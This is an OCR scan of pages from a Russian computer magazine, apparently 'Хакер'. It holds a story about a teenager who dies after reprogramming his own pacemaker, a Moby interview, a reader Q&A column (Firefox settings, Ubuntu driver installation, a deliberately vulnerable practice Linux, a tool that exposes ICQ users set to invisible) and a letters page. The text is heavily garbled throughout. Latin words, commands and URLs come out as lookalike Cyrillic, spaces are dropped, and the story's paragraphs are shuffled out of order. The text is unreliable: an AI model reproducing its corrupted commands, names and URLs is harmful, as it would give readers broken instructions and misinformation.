труда. Он ведь и в школе был освобожден и от 
уборки территории, И ОТ ВСЯКИХ КОЛХОЗОВ; тряпки 
половой в руках не держал. Правда, вел он себя 
при этом нормально, своим положением не 
хвастался, но и ведро с водой ни одной девчонке 
донести не помог. Смотрел вслед, но руки не 
протягивал. 

Интерес к Мишкиному поступлениюу меня быс- 
тро угас, так как мне самому надо было браться 
за ум, читать учебники и всерьез думать отом, 
куда же меня занесет судьба. В один из таких 
дней, наполненных созерцанием себя на диване 
с учебником то ли по истории, толи по биологии, 
я вдруг решил сходить к Мишке и спроситьу 
него совета. Насчеттого, кем он видит меня в 
будущем. Собрался и пошел. 

И я до сих пор помню этот день... Я никогда не 
видел Мишку таким, как втот раз. Он открыл мне 
дверь, и я сразу понял по его выражению лица, 
что я нагрянул совсем не вовремя. Выглядел он 
очень и очень неважно — усталый, бледный, во- 
лосы непричесанные, мокрые, словно из душа. 
Дышит как-то тяжело... 

Мы с ним встали вдверях, глядя друг на друга, 
и я уж подумал, что он заболел, собирался 
справиться о здоровье и сразууйти, но он вдруг 
махнул мне рукой, приглашая в квартиру. 

— Нужна помощь... Разужпришел. 

Я пожал плечами и вошел. Дома Мишка был 
один. Отец — на очередном боевом дежурстве, 
мама — на рынке. В квартире было оченьтихо, и 
я сразу обратил внимание на то, что из комнаты 
Мишки доносится какой-то тихий ритмичный 
писк. Мы взглянули друг на друга, и он пригла- 
сил меня войти. 

Я оказался в этой комнате впервые за послед- 
ние полгода — ровно столько времени Мишка 
не приглашал меня ксебе. Но всетакже на 
компьютерном столе лежали какие-то чертежи 
и схемы, нарисованные на кальке, несколько 
учебников с загадочными названиями... А по- 
верх всего этого бардака — какая-то маленькая 
коробочка. Серебристая, с маленьким светодио- 
дом. Огонек мигал в такт писку... 

Я вопросительно посмотрел на Мишку, он устало 
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махнул рукой и предложил взять стул и сесть 
рядом. 

— У тебя зрение как? Единица? — спросил он 
меня. 

Я очков сроду не носил и кивнул: 

— Нежалуюсь. 

— Ну, тогда смотри... Воттут парочка контактов, 

— он взял со стола эту самую коробочку. — Я 
чего-то устал, вижу хреновато... Ты паять-то 
умеешь? 

Паять я умел. Он объяснил мне задачу, я взял 
паяльник, похвалил оченьтонкое и удобное для 



одному. Программирование — дело тонкое. 
Давай ужзавтра поговорим... Можетбыть... 
Жаль, что это «может быть» не насторожило 
меня сразу. Вполне возможно, я был в состоянии 
если не изменить ситуацию, то хотя бы... Даже 
незнаю что. 

Но я молча кивнул, протянул ему руку и ушел. 

В дверях подъезда столкнулся с его матерью, 
которая тащила полные сумки продуктов. Мне 
бы тогда ей сказать, заставить задуматься, 
присмотреться... Но в семнадцать лет как-то 
не особенно внимательно относишься к ок- 



Которая оказалась последней. 

Потом мы узнали, что его не довезли. Он умер 
в вертолете. Где-то там, под облаками... У него 
остановилось сердце. 

Ему было всего л ишь семнадцать полных лет... 
Он только начинал жить... 

С раннего детства у него выявили какое-то 
очень серьезное заболевание сердца. Говоря 
простыми словами, оно не хотело биться так, как 
предписано природой. Нарушение ритма. И он 
всюжизнь носил в кармане кардиостимулятор. 
Маленькую серебристую коробочку, которая 



«Не поверите^ но он жил так. что не давал 
возможности даже заподозрить хоть 
что-нивудь, предложить 
хоть какую-то версию ■> 



такой работы жало и за пять минут все сделал. 

— Теперь мы это хозяйство к компьютеру 
подключим... — он полез куда-то под стол, я про- 
тянул ему подпаянные провода. Мишка возился 
довольно долго, потом из-под стола сказал: 

— На кухне, в вазочке... Там таблетки в красной 
упаковке. Такие желтенькие. Принеси, пожалуй- 
ста, парочку. И сок. Что-то я не в форме... 

— Желтые. В красной, — повторил я, чтобы не 
забыть, сходил на кухню, принес все, что он про- 
сил. Мишка уже выбрался из-под стола и сидел 
на своей кровати. Дышал он тяжело, схватил 
свои таблетки и проглотил их, даже не обратив 
внимания на стакан сока в моей руке. 

Я впервые видел его таким. Ведь все годы мы 
только и знали о нем, что он освобожден от 
физкультуры и всякой тяжелой работы, но по- 
настоящему больным его не видел никто. Я был 
первым... 

Похоже, он тоже это понял. Взял из моей руки 
стакан сока, выпил, вытер пот со лба, откинулся 
на стену. 

— Что, неважно выгляжу? — усмехнулся он. 

— Сам знаю. Ты только никому не рассказывай, 
хорошо? Что я воттакой... И про коробочку эту... 
Ну, вроде как не видел. Приходил-тоты зачем? 

Я промычал что-то невнятное, самуже не помню 
что. Мишка посидел еще немного, дождался 
действия таблеток, потом потихоньку поднялся 
и сказал: 

— Мне бы поработать... Ты извини, но мне надо 



ружающему миру, если проблема не касается 
тебя лично. Такой вот обыкновенный детский 
эгоизм... 

Мама кивнула мне, что-то спросила. Я также 
вежливо ответил, и мы разошлись в разные 
стороны. Уже уходя, я понял, что таки неузнал, 
кем меня в будущем видит Мишка. Я ведь его 
мнение много значило для меня. 

На следующий день Мишка не пришел в школу. 
Это было первый раз за все четыре года, что он 
учился с нами. Несмотря на свое вечное осво- 
бождение и режим, школу он посещал регуляр- 
но. Правда, я помнил его вчерашнее состояние 
и особенно неудивился. Учительница, подняв 
брови, отметила в журнале его отсутствие и 
продолжила урок. 

А через несколько часов прилетел вертолет, 
большой вертолет санавиации. Он иногда 
посещал наш городок: когда в воинской части 
случался тяжелый больной, и его надо было 
сопроводить в госпиталь. Но на этот раз верто- 
летувозил Мишку. Те, кто видел, какэто было, 
рассказывали, что вместе с ним полетела и его 
мать. Бледный и взволнованный отец провожал 
их, долго глядя в небо... 

Класс был в шоке. Никто ничего не знал и не 
понимал. Несколько девчонок рыдали поти- 
хоньку в углу, парни (в их числе и я) курили за 
школой, сплевывая себе под ноги, и молчали. Я 
изо всех сил сдерживался, чтобы не рассказать 
о моей вчерашней встрече с Мишкой, которая... 



заставляла его сердце биться — шестьдесят 
ударов в минуту. 

Именно поэтому он не могзаниматься физ- 
культурой — «водитель ритма» не вытянул бы 
потребности организма. Вот и поднимался он по 
лестнице с перерывами, и мяч пинал с опаской... 
Отец по каким-то своим каналам выбил ему 
американский кардиостимулятор — и размера- 
ми поменьше, и понадежнее. И еще в нем был 
процессор. 

Когда Мишка узнал об этом, он уже с отцовской 
подачи неплохо соображал в ассемблере. И 
сделал вывод — раз есть процессор, значит, в 
его работе можно что-нибудь изменить. Можно 
заставить «водитель ритма» откликаться на 
изменениетемпажизни. На игру в футбол. На 
физическую работу. И он стал писать программу... 
В тот день, когда я видел его в последний раз, 
он собирался залить программу в кардиости- 
мулятор. Насколько я понял, он неоднократно 
тестировал ее на компьютере, прежде чем 
решиться выполнить прошивку прибора. 

Но что-то пошло нетак... 

Я до сих пор вспоминаю о нем с огромным ува- 
жением. Ведьу него не было права на ошибку... 
Он очень хотел быть как все. Бегать, прыгать, 
наслаждаться полнотой жизни... 

И он был первым хакером, который хотел 
подобрать код к собственному сердцу. Жаль, что 
жизнь не дала ему второй попытки. 

Жаль. -шг 
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Ш М\ гЛл\7 Рассказывает о новой 
ІіЮѴ пластинке, вегетарианстве, 
панке и Джордже Буше в эксклюзивном 
интервью нашим друзьям с радиостанции 
ЕЫЕР6У 104.2 РМ (ЫРЛ 



ПРО НАЗВАНИЕ ПОСЛЕДНЕГО АЛЬБОМА «00 — ТНЕ ѴЕРѴ ВЕ5Т ОР МОВѴ» 



Моим основным критерием при выборе названия и подборе песен не был собственный 
вкус — я включил в сборник «Бэст оф» не свои любимые песни, которые я написал, а те 
песни, которые больше всего нравятся моим слушателям и друзьям. Я, наверное, один 
из немногих музыкантов, который если бы собирал сборник лучших хитов сам, то вклю- 
чил бы в него всего пару- тройку песен. Вот и пришлось опросить кучу людей и выбрать 
треки на их вкус, так как мне кажется, что мои слушатели все же более объективны, чем я. 



Альбом «Со — ТНе Ѵегу Везі 0* МоЬу» включает только мегахиты? 

Да, я думаю, что все песни, вошедшие в альбом «Бэстоф», — это абсолютные 
хиты. Это же очевидно, если альбом назван «Лучшее из Моби», значит, в 
него попали мои лучшие песни. Мои поклонники давно просили меня издать 
такую пластинку. Ну, чтобы просто включить диск и уже ничего и никуда не 
переключать, слушать и наслаждаться. Вот просили — я и сделал. В общем, 
если купите этот сборник— не разочаруетесь! 

Любимая музыка 

Я самобожаюсборникитипа«Грейтестхитс».У меня есть любимые артисты, поч- 
ти всегдауменя под рукой Сгебепсе и Ролл ин г Стоуне. Ролинги вообщезасвою 
карьеру вы пусти л и аж 20 пластинок «Лучших хитов». Мои любимые — «Ѳгееп 
ѲгаззапсІ НідЬ Тісіез» и «Ноі Носка». Альбом Дэвида Боуи «СЬапдез 1» — отлич- 
ная тема. Альбомы хитов Маге Воіап и ТНех’з тоже обожаю. А вотза последние 
20 лет в мою коллекцию не добавилось ни одной пластинки «Грейтестхитс» како- 
го-либо исполнителя. Мне по душе более старая музыка, уровеньзаметноупал... 

Музыкальный наркоман 

Знаете, когда я пишу музыку, я просто ее пишу. Тяжело объяснить. Я пишу ее, 
потому что не могу не делать этого. Это единственное, что я умею делать и что 
мне доставляет удовольствие. Это удивительное средство, с помощью кото- 
рого я могу выразить свои чувства и эмоции. Я помню, как когда-то, еще в де- 
тстве, сказал себе: «Те мысли и вещи, которые живут во мне, я могу донести до 
людей только с помощью музыки». Это не просто любовь к музыке, это смысл 
жизни. Я в каком-то смысле наркоман. Мне плохо, если я не пишу и не пою! 

В прессе есть мнение, что Моби — бунтарь, а что думает об этом он сам? 

Честно говоря, я не думаю, что я прямо-таки бунтарь и делаю что-то, пот- 
рясающее умы. Просто громкий. Я вижу все немного по-другому. До меня 
существовало только одно мнение: электроника — это клубная музыка. Но тут 
появился я со своим панк-роковым прошлым и привнес в электронную 
музыку рок-н-ролл. Может, поэтому меня и называют бунтарем, а мою музыку 
— очень противоречивой. Возможно, дело в необычном звучании или просто 
в моей индивидуальности и некотором нарциссизме, которым я страдаю. 

Моби и танцевальная музыка 

У меня странные отношения станцевальной музыкой. Чем больше я влюбля- 
юсь в эту культуру, тем меньше у меня самого получаются настоящие танце- 
вальные треки. Последний такой трек я написал аж 1 1 лет назад. Ну в общем, 



мне нравится ди-джей культура, я обожаю танцевальную музыку, я покупаю 
кучу пластинок, но сам себя я не назвал бы героем именно этой клубной 
сцены, я все же где-то немного выше ))). 

О глубоком смысле 

С самого начала, какятолько начал писать музыку, я стремился вовлечь 
слушателя в мир, который так глубоко засосал меня. Когда я пишу, я хочу 
заразить всех людей таким же отношением, хочу, чтобы они прочувствовали, 
почемуяживу именнотаки почему без музыки жить невозможно! Нельзя 
донести до людей что-то великое, не пытаясь сделать что-то великое. В моей 
музыке и словах заключен глубокий смысл, идущий прямо из сердца. Это все 
не просто та к, и я надеюсь, что другие люди это чувствуют! 

Почему Моби не поет про Джорджа Буша 

Вообще-то, я пытался писать какие-то остросоциальные песни. Я пытался 
писать песни, вдохновляясь деяниями политиков, социальными и этичес- 
кими проблемами. Все это всегда было, есть и будет — и это ужасно! Но на 
свете существует очень много артистов, которые за последние 30-40 лет 
собаку съели на исполнении и написании всяких социально-политических 
песен: РиЫіс Епегшу, СІазЬ ог Саі Эіеѵепз, Сгебепсе Сіеагѵѵаіег Неѵіѵаі. 

У них это получается органичной талантливо. А у меня же подобные песни 
звучат как-то напыщенно, назидательно и скучно. Так что скажите спасибо, 
чтоя неувлекся социальной тематикой, ато бы выумерли соскуки ))). А ес- 
ли мнеужоченьзахочется высказаться о Джордже Буше, я лучше напишу 
эссе в газету! 

Начинал с панка, и возможно, к нему вернется 

Когда я рос, мне были по душе самые разные стили музыки. Мне нравилась 
и попса, звучащая тогда по радио, и старинные пластинки, которые слушала 
моя мама, и музыка, под которую балдели друзья моего брата. Мне нравилось 
все. Но когда я впервые услышал панк-рок и нью-вейв, я понял, что вот моя 
музыка! Потом я стал ходить по ночным клубам. Тогда в Нью-Йорке имели 
привычку ставить подряд регги, панк-рок, хип-хоп, диско и нью-вейв, и 
все это опять перемешалось в моей голове. Я начал делать музыку, которую 
любил — панк, но потом туда столько всего намешалось. Некоторые меня 
до сих пор за это осуждают. Я люблю танцевальную музыку, но точно также 
я люблю и панк. И не исключено, что рано или поздно я к нему вернусь. Это 
моя музыка, как бы странно это ни звучало. Так что ждите от меня жесткого 
па нк- рокового альбома! 

















ІПро свой жизни и вегетарианство 

ІЯ до сих пор помню интервью, взятое у меня лет 1 5 или 16 назад, когда я 
^'■сказал. что я вегетарианец и христианин и что натотмоментне пьян. Прошло 
.1 6 лет, но эти слова все еще крутятся вокруг меня, и мне все время задают 
И^Ѵподобный вопрос. Почему бы вам не перестать воспринимать меня как 
ккакого-то инопланетянина со странными вкусами и привычками, а просто 
іпонять, что я музыкант. Мне гораздо приятнее говорить про музыку, нежели 
Чпросвой рацион и привычки. Да, я по-прежнему вегетарианец, но, по-моему, 
^личное дело каждого — что он ест, когда и как. И я не призываю никого вести 
такой же образжизни, какя, и не говорю, что это правильно. То же самое с 
религией. Каждому свое! 



Записьтрека кфильму про Джеймса Бонда 

Честно говоря, я никогда и не мечтал записатьтрекдля фильма про Джеймса 
Бонда. Но ко мне намертво пристали люди из М6М и прямо-таки потребовали 
написать трекдля части «Туморроу невер дай». Ох, это был о тяжел о. Во-первых, 
я все время думал, что мне низа что неудастся сравниться и даже приблизиться 
коригинальному классическомутреку Джона Бери, а во-вторых, Джеймс Бонд 
— отличное кино, но немое. Ну нелюблюятакиефильмы. В общем, ядолго 
ломался, в итоге написал и все равно недоволен. Но многим нравится ))). 



Альбом «Плей» разошелся миллионным тиражом — Моби не ожидал 

Это было странно. Успех «Плей» меня немного потряс, потому что никто не 
ожидал, что это будеттакая бомба. Это был просто мегауспех, именно стого 
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момента я и стал звездой Моби. Но это мне вовсе не вскружило голову, по- 
тому чтоя оченьдолго не могповерить, что это происходитсо мной. Честно 
говоря, издавая альбом «Плей», я собирался закончить им свою музыкаль- 
ную карьеру. Ну, думаю, надо постараться записать еще один и расслабить- 
ся. И тутвоттакое! Сюрприз! 



«Каждая моя песня — это кусочек моего сердца» 

Когда я пишу свою музыку, я выкладываюсь эмоционально. Если я пишу 
песню с названием «Почему моему сердцу та к больно», это значит только то, 
что мне действительно плохо и я страдаю. Я неумею придумывать и врать в 
музыке. Каждая моя песня — это кусочек моего сердца. Это не просто громкие 
слова, и мои настоящие поклонники знают, что я искренен. 



Моби и слава 

Я помню, как первый раз почувствовал, что такое слава. Я учился в школе, 
играл в панк-рок группе, и наша школьная газета написала про нас. Там на 
обложке была моя фотка, и вот в один момент в своей школе 
я стал рок-звездой. Но мне было неуютно от внимания окружающих. 
Потом я стал известным ди-джеем в популярном нью-йоркском клубе, 
но мнетоже было не оченьуютно оттого, что все меня знали. И даже 
когда я стал гуру танцевальной музыки, ятаки несмог свыкнуться со 
славой. У славы есть только два плюса: огромное количество людей, 
которые любят твою музыку и приходят на концерты. Работа тяжелая, 
устаешь, но когда думаешьотом, что ты делаешь это для людей, 
которые ждут этого, сразу поднимается настроение. И второй 
плюс — ты становишься частью музыкальной истории, на тебя 
равняются. В остальном же слава — это утомительно и не очень приятно. 

Я, вообще, человек скромный, и мнетяжело быть в обществе звезд и вести 
себя какзвезда. 



О планах 

Сейчас я выпущу «Бэст оф», потом немного отдохну и приступлю работе 
над новой пластинкой. У меня уже есть 400 или 500 песен, осталосьтолько 
отобрать лучшее и издать — может, весной, может, осенью 
этого года. Не знаю пока, будет это танцевальный альбом, или 
роковый, скорее всего, ито и другое — у меня полносамых 
разных песен, на любой вкус! 

По материалам радиостанции ЕЫЕКБУ 104.2 РМ (ІЧВД^с 
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СТЕПАН «ЗТЕР» ИЛЬИН 

/ РАОВЕАЬ ХАКЕР. ГШ / 



НАСКРАОГаКЕМ.ХАКЕР.КЦ 



ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ, 
ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯКОМ/ФРИКОМ, ДЛЯ ЭТОГО 
ЕСТЬ НАСК-ЕАО (НАСКЕАО@ВЕАЬ. ХАКЕР. ВЫ); НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА КОТОРЫЕ ТЫ 
ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, 
ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 



О: Чудный браузер Гігеіох, не- 
смотря на все свои плюсы, кушает 
системную память как последняя 
зараза. Как бы это можно было 
исправить? Разжиться еще одной 
планкой ВАМ возможности у меня 
пока нет. 

А: Итак, рабочий рецепт. Сначала набери 
в адресной строке «аЬоиГсопбд», чтобы 
перейти к странице для тонкой настройки 
браузера. Там ты найдешь параметр Ьгоѵѵвег. 
5е55ІопИІ5іогу.тах_епІгіе5, который по 
умолчанию имеет значение 50 . Уменьшим 
его, скажем, до 5 и далее, поработав часок- 
другой с браузером, начнем ощущать нехилый 
прирост производительности. Почемутак? 
Очень просто: с помощью этого параметра 
мы задаем максимальное количество сайтов, 
которые Еігеіюх подгружает в память. Такие 
сайты моментально подгружаются прямо из 
оперативки, если мы открываем их вновь 
(например, нажимаем кнопку «Назад» или 
«Вперед»), Пять десятков сайтов, постоян- 
но висящих в памяти, — непозволительная 



роскошь, вот мы это и исправили. Кстати 
говоря, описание всех остальных параметров 
страницы «аЬоиі:сопбд»ты найдешь на сайте 
ННрУ/кЬ.ппогіиагіпе.огд/АЬоиЬсопЛд епігіев 
или нашем диске. Покопайся — интересно. 

О: Поставил ІІЬипІи с вашего дис- 
ка. Подскажи, как можно обновить 
драйверы для моей видеокарты? У 
меня никак не получается! 

А: Действительно, установить драйверы для 
видюхи с нуля, еще и не имея опыта за плечами, 
довольно сложно. Чтобы не приводитьтут длин- 
ные инструкции (а понадобилось бы описать про- 
цедуру как для драйверов АТІ, так и для КІѴЮІА), 
я расскажу о наиболее простом способе. Правда, 
для его реализации понадобится вспомогатель- 
ная тулза, но будьуверен, что установить ее не 
состав ит труда. Речь идет о небольшой утилите 
Епѵу, которая сделает всю работу по установке 
драйверов и настройке системы за тебя. Итак, 
действуем. 

1. Начинаем сзакачки вспомогательной 
программы: 



Д ЕДДр : / /аІЬегДошіІопе . сот/ 
иЬипДи / пѵі (іі а / з с г ірД з / епѵу_ 

0.8. 1-0иЪипДи6_а11 . сіеЪ 

2. Устанавливаем ее в систему: 

зисіо сіркд -і епѵу_0 . 8 . 1-0иЪипДи6_ 
аіі . сіеЪ 

3. Жмем «АІі-СМ-РІ », чтобы выгрузить 
Х-ѴѴІпсІоѵѵв, и в окне появившегося терминала 
набираем командуепѵу. 

Вот, собственно, и все: нажми несколько раз 
«Уев», и очень скоро в твоей системе будутуста- 
новлены последние драйверы, а сама она загру- 
зится вХ-ѴѴіпсіоѵѵб. Если ты сейчас читаешь эти 
строки и громко материшься из-за того, что Епѵу 
утебя почему-то не работает, набери в консоли 
следующие команды и попробуй еще раз: 

зисіо арДіДисіе ригде епѵу 
зисіо гш -К /изг/зЬаге/епѵу 

Должно помочь. 
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О: У меня довольно необычная 
проблема: я люблю спокойно спать. 
А проблемой этот факт становится 
потому, что я не могу применить зна- 
ния, полученный со страниц вашего 
журнала. Быть может, есть способ 
попрактиковаться во взломе, да так, 
чтобы мне за это точно ничего не 
было? 

А: В случае со взломом программ все предельно 
просто. Начинающие сгаскег'ы могуттрениро- 
ваться на небольших программах, которые спе- 
циально созданы для того, чтобы их взломали. Я 
говорю отакназываемыхсгаскгшез’ах, которые 
можно скачать, например, с ѵѵѵѵѵѵ.сгасктез.сіе . 
Для удобства они рассортированы по сложнос- 
ти, а для многих из них выложены мануалы по 
прохождению! 

Немного сложнее обстоят дела со взломом 
реальных систем, но и здесь есть выход. Возьми 
на заметку тренажеры для хакера, которые мы 
выкладывали на одном из недавних дисков, 
ежемесячные конкурсы взлома от «X», а также 
совершенно новый проект— Оаглп ѴиІпегаЫе 
Ыпих [ ѵѵѵѵѵѵ.сІапппѵиІпеаЫеІіпих.огд ). Его созда- 
тели также, как и ты, считают, что в Сети сейчас 
распространяется огромное количество мате- 
риалов по информационной безопасности, но 
возможности практически применитьзнания, не 
нарушая закон, пока нет. И вот как парни решили 
эту проблему. В своем дистрибутиве они наме- 
ренно оставили бажные демоны, к которым легко 
можно применить сетевые сплоиты, уязвимые 
сценарии, позволяющие выполнить наиболее 
распространенные виды атак (БОБ-инъекция, 
Х55 и т.д.), и просто недостаточно защищенные 
приложения специального для того, чтобы 
желающие могли потренироваться эти самые 
уязвимости находить. Словом, не дистрибутив, 
а настоящая находка. Поэтому мы с радос- 
тью выложили его на ОѴй вместе с парочкой 
видеоуроков. 

О: Одногруппник прислал 
ѵѵогсГовский документ с каким-то 
странным расширением — *.сіосх. 
Как его открыть вообще? 

А: С точно та кой же проблемой очень скоро стол- 
кнутся многие из нас. И все потому, что в недавно 
вышедшем Місгозоб: ОІІісе 2007 используется не 
старый привычный формат, а совершенно новый 
принцип хранения документов, основанный на 
технологии ХМБ (подробности на ЬирУ/пеѵѵз. 
оШсе-ууа1сЬ.сотД/п.азрх?а=25&2=9&раде=2 ). 
Вместо привычных *.бос, *.х1з, *.ррІ, мы имеем 
файлы *.босх, *.хІзх, *.рр1х, каждый из которых 
представляет собой обычный 2 Ір-архив с. 



многочисленнымиХМЕ-файлами, описыва- 
ющими структуру и содержание документа. И 
все бы было замечательно (я бы даже похвалил 
такой подход), если бы не одна загвоздка: старый 
ОШсе, который, по всей видимости, ты и исполь- 
зуешь, стакими файлами водиться поумолчанию 
отказывается. И чтобы даже просто открыть 
документ для просмотра придется немного 
позаморачиваться, например пропустить 
босх-файл через специальный опііпе-кон- 
вертер ѵѵѵѵѵѵ.босх-сопѵегіег.сот . Нолучше 
все-таки сразу установить в систему пакет для 
совместимости с О^ісе 2007, доступный на сайте 
МісгозоО: и на нашем 0Ѵ0, и полноценно работать 
с файлами. 

О: Что такое гіпд-О? Что вы имеете 
в виду, когда говорите, что прило- 
жение работает на уровне ядра или, 
например, на уровне пользователя? 

А: Несмотря на то что современные процес- 
соры поддерживают четыре уровня приви- 
легий, которыетакже называют кольцами 
защиты, в винде реально используется только 
два: нулевой — для режима ядра (тот самый 
гіпд-0) итретий —для режима пользователя. 
Начнем с простого: зачем они вообще нужны? 
Аты вообрази себе, что любая программа 
(например, скачанная из интернета) могла 
бы напрямую писать в любую ячейку памяти 
и обращаться коборудованию. Несложно 
представить, во что бы превратилась работа 
на компьютере: сплошные экраны смерти, 
подвисания и просто нестабильная работа. Вот 
чтобы подобного безобразия не происходило, 
было решено ограничить пользовательские 
приложения своим собственным окружением. 
Пользовательский режим всячески ограни- 
чивает прикладные приложения, чтобы те не 
косячили и ни в коем случае не могли влиять на 
работу системы в целом (хотя им все равно это 
как-то удается). Для процессов, работающих в 
изег-тобе, выделены свои защищенные ад- 
ресные пространства. Потоки таких процессов 
выполняются в непривилегированном режиме 
процессора, поэтому не могут использовать 
привилегированные команды СРІІ и имеют 
крайне ограниченный доступ к системным 
данным. О прямом доступе коборудованию 
в пользовательском режиме, само собой, не 
можетбыть и речи. Любые попытки выйти за 
пределы установленных ограничений жестко 
пресека ются. 

С компонентами ядра совсем другая история. 
Всеони выполняются водном и том же адресном 
пространстве, причем в привилегированном 
режиме процессора (режим ядра). Азначит, легко 



могутвызыватьлюбые, втом числе привилегиро- 
ванные, команды, имея в распоряжении прямой 
доступ коборудованию. Работая над серьез- 
ным проектом, где необходимо обращаться к 
внутренним функциям системы, ты обязательно 
столкнешься с массой ограничений пользова- 
тельского режима. И преодолеть их можно, разве 
что разместив код в гіпд-0. Из документирован- 
ных способов существует только один — установ- 
ка драйвера устройства. Будучи загруженным 
в системное адресное пространство, драйвер 
становится частью системы, и на него не накла- 
дываются какие-либо ограничения. 

О: С интересом прочитал вашу ста- 
тью «Сотовый на халяву, или новые 
возможности Бкуре». Возник такой 
вопрос: а есть ли возможность свя- 
зать между собой Бкуре и модем с 
голосовыми функциями? Чтобы зво- 
нок через Бкуре перенаправлялся на 
обычный городской телефон (через 
модем и телефонную линию), или, 
наоборот, чтобы звонок с городского 
телефона адресовался через инет 
Бкуре-абоненту, который живет за 
тысячи километров? 

А: Описанная схема реально работает, если на 
компьютер установить утилиту Бкуре Еогѵѵагсіег 
( ѵѵѵѵѵѵПѵѵіІідЬіиІІІІІІез.сот ). Я даже не поленился 
и подключил к компьютеру уже забытый мною 
модем, который тутже определился программой. 
Оказалось, что прога предлагает несколько 
режимов работы, так что переадресацию можно 
настроить в обе стороны. 

О: Существует ли сейчас реально 
рабочий способ определить, что 
человек находится в іпѵізіЫе (я имею 
в виду ІСО). Плагины для Миранды и 
соответствующая возможность в ОІР 
больше не работают. 

А: Действительно, послетого как разработчики 
устранили в протоколе ІСО несколько багов, 
определить, что человек прячется в инвизибле, 
стало намного сложнее. Ксчастью, умельцы с 
азесЬка.гц подсуетились и быстро зарелизи- 
ли специальную утилиту піс (пеѵѵезі іпѵівіЬіІііу 
сбескег). Нужно лишь зарегистрировать себе 
вспомогательный иіп (регистрация дополнитель- 
ного аккаунта возможна прямо из программы — 
выбери в выпадающем меню пункт«РедІ5Іегпеѵѵ 
ассоипЫ и ввести номертого, кого ты хочешь 
проверить. Важный момент: если проверяемый 
использует дір, то он получит соответствующее 
сервисное положение. Но что, собственно, от 
это го м е н я ется ? □С 
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АЛЕКСАНДР ЛОЗОВСКИЙ. 



На письма отвечал веселый доктор Лозовский 



Р/топ ($Іапдег4@уапсІех. ги) 

Здравствуйте, редакция моего любимого журнала. Спасибо, конечно, 
вам за журнал. Только расстраивает то, что цена на него растет, а на- 
чинка становится хуже. Какие люди были! Эг. Добрянский, да и Холод 
чего стоил. Жалко рубрику «Западлостроение», сколько ламаков 
пострадало от нее! И почему убрали «Хумор»? А в «Кодинге» пишите 
статьи подробнее — не все же знают одинаковые языки программиро- 
вания и не всегда ясно, что означает та или иная строчка кода. И еще, 
надеюсь, вы не будете против, если я на своей хомпаге помещу вашу 
ссылку в раздел «Друзья». 

С уважением, ваш постоянный читатель 

Привет! Судя по всему, ты хочешь, чтобы я вместе стобой окунулся в 
мутную пучину ностальгических воспоминаний о прошлом «Хакера»? Да 
легко! Так вот. Доктор Добрянский ака Ог.СосІ — известный раздолбай 
(если кто-нибудь задокументировал случаи соблюдения им дедлайнов 
— срочно пишите мне!), техноманьяки электроонанист— никуда и не 
пропадал. По крайней мере, из медиакомпании Ѳатеіапсі. Просто он 
работает в тестлабе — там рано или поздно изолируют всех, кто родился 
с паяльником вместо... эээ... Ну в общем, технически продвинутых людей 
там изолируют. Более того, в новом «ІТ Спеце» он будет вести небольшую 
рубрику. 

Холод? Да, Холод — это крепкий парень. С «Хакером» и «Спецом» он ра- 
ботал с самого начала, а когда весь бакланизм и нездоровый приколизм 
(как мне он нравился :()ушел в «Хулиган», стал его главредом. Точнее, не 
так. Наверное, это Холод и бакланизм создали «Хулиган». Затем он ушел 
из главредов этого контркультурного журнала и занял в медиакомпании 
какую-то хитрую должность, название которой я не смогу воспроизвести 
по памяти. Помнютолько, что там присутствовало слово «менеджер». А 
сейчас он вообще покинул нашу контору :(. 
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С ностальгией покончим, мне осталось ответить на два вопроса: про рас- 
тущую цену журнала и про «Западлостроение». Так вот про цену: луч- 
ше даже не заикайся — мы, между прочим, вернули размер журнала 
160 полос и апгрейдили йѴО до двухслойного совершенно бесплатно! Без- 
возмездно, даром! Аот«Западлостроения» мы отказалисьдавно — слишком 
брутальное это дело. Нуда ладно, на диск я выложу свою статью, которая в 
далеком 2001 году не вошла в «Кодинг» «Хакера» и была опубликована на 
сайте моего друга НоггТіс’а, а впоследствии растырена по рунету:). 

ІпЮгтаЮг49 (іпЮгтаЮг.49@дтаіІ.сот) 

Я_вот_не_могу_понять. . ._Для_хаЦкера_главное_ 

что?!_Правильно!_АНОНИМНОСТЬ,_тогда_объясни- 

те_мне,_почему_в_статье_о_взломе_какого-либо_сервиса 

_автор_спокойно_публикует_свое_имя,_мыло_и_фото???_Пом- 

ню,_был_тазІег-Іате-та5іег_(а_может,_и_сейчас_есть)_ — _ни_име- 

ни,_ни_фото,_ни_мыла... 

И_почему_статьи_выходят_примерно_через_3_месяца_после_взлома? 

Ну_ВСЕ... 

Я вот не могу понять, что случилось ствоей клавишей «Пробел»? Ее похи- 
тили пришельцы? Или ее съел младший брат, перепутав с шоколадным 
батончиком? А может быть, ты предпочитаешь пользоваться механи- 
ческой клавиатурой, атеперь в ее винтиках и герконахзавелась пыль и 
агрессивные насекомые, вследствие чего аппарат вышел из строя? 
Короче говоря, дело втом, что все взломы в нашем журнале придуман- 
ные. Да и авторы тоже не настоящие, а надувные или даже глиняные. Мы 
покупаем их в секс-шопе, втыкаем в розетку и сажаем на клавиатуры в 
надежде, что, согласнотеории вероятности, их вибрация породит какой- 
нибудь связанный текст. Воттакие дела, просто нам нечего стесняться. 
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глада? 



А тавіег-іате-тавіег — это вообще не человек, а собирательный образ 
типа Козьмы Пруткова. Под этим ником пишут разные суперсекретные 
суперхакеры. 

Некто Зотеѵѵііеге (таіІ1@Ьк.ги) 

Здравствуйте! Мне настолько нравится журнал «Хакер», что хочу его 
ВЕСЬ скачать! Подскажите, пожалуйста, как это технически осуществить! 

С помощью библиотеки ѵѵіпіпеі. сІИ и тибетских шаманов напиши супер- 
магический даунлоадер, который сможет качать даже то, что никем и 
никогда не было опубликовано в интернете! 

Никита Палешев ($ирег_Ьа1@гатЫег.ш) 

Хитрая штучка 

Здравствуй, дорогая редакция! У меня недавно возник такой вопрос! 
Можно ли сделать какую-нибудь хитрость, чтобы винда слетала сама 
